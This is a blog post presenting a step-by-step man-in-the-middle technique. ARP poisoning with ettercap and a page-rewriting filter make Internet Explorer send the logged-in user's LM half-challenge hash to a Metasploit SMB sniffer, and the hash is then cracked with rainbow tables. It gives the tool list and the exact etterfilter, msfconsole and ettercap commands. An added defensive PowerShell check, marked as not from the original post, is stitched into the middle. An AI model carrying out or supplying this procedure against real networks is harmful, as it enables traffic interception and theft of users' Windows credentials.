Grabbing LM challenges with an ettercap filter
hack-fu by: bob
So… this is an amalgamation of several ideas and bits of work I’ve found floating around that I put together. The result is a handy pentesting/pwnage technique. The blog post that kicked this idea off discusses a modified Metasploit exploit module called smb_server.pm by Kurt Grutzmacher: NTLMv1, Metasploit and You. Around the same time I’d been playing with some ettercap filters, based on the work at Irongeek: Fun with Ettercap Filters. These two sparked something and gave me a use for those huge LMHALFCHALLENGE rainbow tables I’d downloaded.
Goal:
To retrieve a client’s currently logged-in credentials by manipulating their HTTP stream (via a MITM attack). Most of the clients seen during various internal tests were pretty well firewalled and patched. However, by manipulating a client’s HTTP stream it was possible to have them send their username and the majority of their password hash.
Conditions:
As with most things, there are some conditions that must be in place for this to be successful, and also requirements that the credential snarfer must have sorted. Client conditions:
- The target client must be using a version of IE for their browsing. During testing, IE appeared to be the only browser that by default sends the response to the challenge for the locally logged-in user that we’re after.
- The client must be on the same network segment, for the MITM attack to work of course.
- Only LANMAN hashes can be obtained this way. If the client has been configured to support NTLM only then we lose. Most default installs will not be set up this way, though you may encounter more secure setups in some corporate environments.
- Only the first 7 characters are in the tables. You’ll have to brute force the rest of the password.
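A defender-side check to go with the NTLM-only condition above (an added example, not from the original post): a PowerShell snippet that reads the LSA LmCompatibilityLevel value on a Windows host and reports whether LM responses will still be sent. It assumes it is run locally with rights to read HKLM.

```powershell
# Added example: audit whether this host still emits LM (LANMAN) challenge
# responses, which is the client condition the technique above relies on.
# Registry value behind the policy "Network security: LAN Manager
# authentication level".
$lsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$level  = (Get-ItemProperty -Path $lsaKey).LmCompatibilityLevel

# Documented meaning of LmCompatibilityLevel:
#   0,1 = send LM and NTLM responses        -> LM half-challenge is exposed
#   2   = send NTLM response only           -> no LM response on the wire
#   3-5 = send NTLMv2 only (4 and 5 also refuse LM / LM+NTLM as a server)
function Get-LmExposure([object]$lvl) {
    if ($null -eq $lvl) {
        # Value absent: the OS default applies. Older clients such as
        # Windows XP default to 0, so treat "unset" as exposed until verified.
        return 'UNSET (OS default; older clients send LM responses - verify)'
    }
    if ([int]$lvl -le 1) { return "EXPOSED (level $lvl sends LM responses)" }
    return "NOT EXPOSED (level $lvl does not send LM responses)"
}

$status = Get-LmExposure $level
Write-Output "$env:COMPUTERNAME LmCompatibilityLevel: $status"
```

Set the level to 3 or higher (via Group Policy on domain members) to remove the LM response this technique depends on.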
Attacker’s Rig:
- Some LMHALFCHALL rainbow tables: halflmchall_all-space_1-7.torrent (54gig) -or- halflmchall_alpha-numeric_1-7.torrent (5gig)
- Metasploit, plus Kurt Grutzmacher’s exploit module smb_server.pm from here (this does not work on Windows):
- http://metasploit.com/tools/: Looking for Framework v.2.7
- smb_sniffer.pm
- Ettercap plus an ettercap filter to rewrite the victim’s web pages: LMHC_etter.filter.
- Cain & Abel to perform the cryptanalysis of the LMHALFCHALLENGE hashes recovered. As far as I know these rainbow tables for LMHC were created with the Cain & Abel utility winrtgen and are therefore incompatible with the patched version of rcrack.
Attacker Process:
- Fix up the IP address in the LMHC_etter.filter file to represent the host you’ll be running Metasploit 2.7 and the smbsniffer exploit module from.
- Compile that with:
  etterfilter.exe -o LMHC_etter.ef LMHC_etter.filter
- Unpack Metasploit 2.7 from the above link and place smb_sniffer.pm under the exploits/ directory.
- Install and run as root.
- Metasploit commands:
  framework-2.7 $ sudo ./msfconsole
  msf > use smb_sniffer
  msf smb_sniffer > set PWFILE=/tmp/smb_sniffed.pw3
So the SMB sniffer is now listening, waiting for connections from the victim’s IE. We need to rewrite some of their web requests to ensure they pass us their LMHALFCHALLENGE hashes.
- Run up ettercap using our compiled filter from earlier, to perform the ARP poisoning attack, with the following:
ettercap -Tq -M arp:remote -F /mnt/LMHC_etter.ef /GATEWAY ADDRESS/ /VICTIM ADDRESS/
- When the page gets rewritten correctly, IE will attempt to make the connection and send the logged-in user’s credentials to your waiting server.
- This results in a pwdump-compliant output file called smb_sniffed.pw3.
- Switch to Cain & Abel for the hash cracking.
- Select the hash you want to crack, right click and select Cryptanalysis Attack->HALFLM Hashes + challenge->via RainbowTables, add the tables, and crack it.
Some Other Things To Play With In The Same Environment:
Also: MSFweb 3.0 part 2 (via Milw0rm videos)